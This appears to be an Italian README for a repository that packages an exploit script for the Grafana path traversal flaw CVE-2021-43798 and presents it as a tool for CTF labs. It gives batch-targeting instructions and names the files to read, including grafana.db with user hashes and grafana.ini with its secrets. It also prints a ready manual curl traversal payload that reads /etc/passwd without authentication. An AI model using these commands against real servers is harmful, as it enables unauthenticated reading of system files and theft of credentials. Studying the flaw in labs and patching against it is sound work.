
📂 Grafana LFI Exploit (CVE-2021-43798). Estrazione automatizzata di credenziali e configurazione. 🕵️
🚀 Grafana LFI Exploit (CVE-2021-43798)
Script di automazione in Python 3 per sfruttare la vulnerabilità di Local File Inclusion (LFI) in Grafana (versioni dalla 8.0.0 alla 8.3.0). Questo exploit consente di eseguire un directory traversal per leggere file sensibili del sistema operativo senza autenticazione. ✨ Caratteristiche
Compatibilità Python 3.10+: Patchato per funzionare con versioni moderne di Python (correzione di collections.Mapping).
Scansione in Lotto: Capacità di elaborare più obiettivi tramite un file targets.txt.
Decifratura dei Dati: Include moduli per la gestione di sessioni e dati cifrati di Grafana.
Ottimizzato per CTF: Output pulito e diretto, ideale per laboratori come HackTheBox e TryHackMe.
🛠️ Requisiti e Installazione
A causa delle dipendenze da librerie datate, si consiglia di installare i seguenti pacchetti: Bash
pip3 install PyInquirer termcolor requests pycryptodome --break-system-packages
Nota: Se usi Python 3.10 o superiore, lo script include una patch automatica per la compatibilità con collections.abc.
🚀 Utilizzo
Configurare gli obiettivi: Aggiungi gli URL (con porta) nel file targets.txt.
Bash
echo "http://10.129.234.47:3000" > targets.txt
Eseguire l'exploit:
Bash
python3 exploit.py
🎯 Obiettivi comuni di lettura (LFI)
Una volta eseguito, puoi provare a leggere file critici come:
/etc/passwd (Utenti di sistema)
/var/lib/grafana/grafana.db (Database con hash degli utenti)
/etc/grafana/grafana.ini (Configurazione e segreti)
💡 Metodo Alternativo (Manuale)
Se preferisci non usare lo script, puoi sfruttare l'LFI direttamente via curl: Bash
curl --path-as-is "http://<TARGET_IP>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
⚠️ Disclaimer
Questo repository è stato creato esclusivamente a scopo educativo e per l'uso in ambienti controllati (CTF, laboratori). L'autore non si assume alcuna responsabilità per l'uso improprio di questo strumento. 🏷️ Topic (Tag)
grafana, cve-2021-43798, lfi, exploit, pentesting, hackthebox, python3, directory-traversal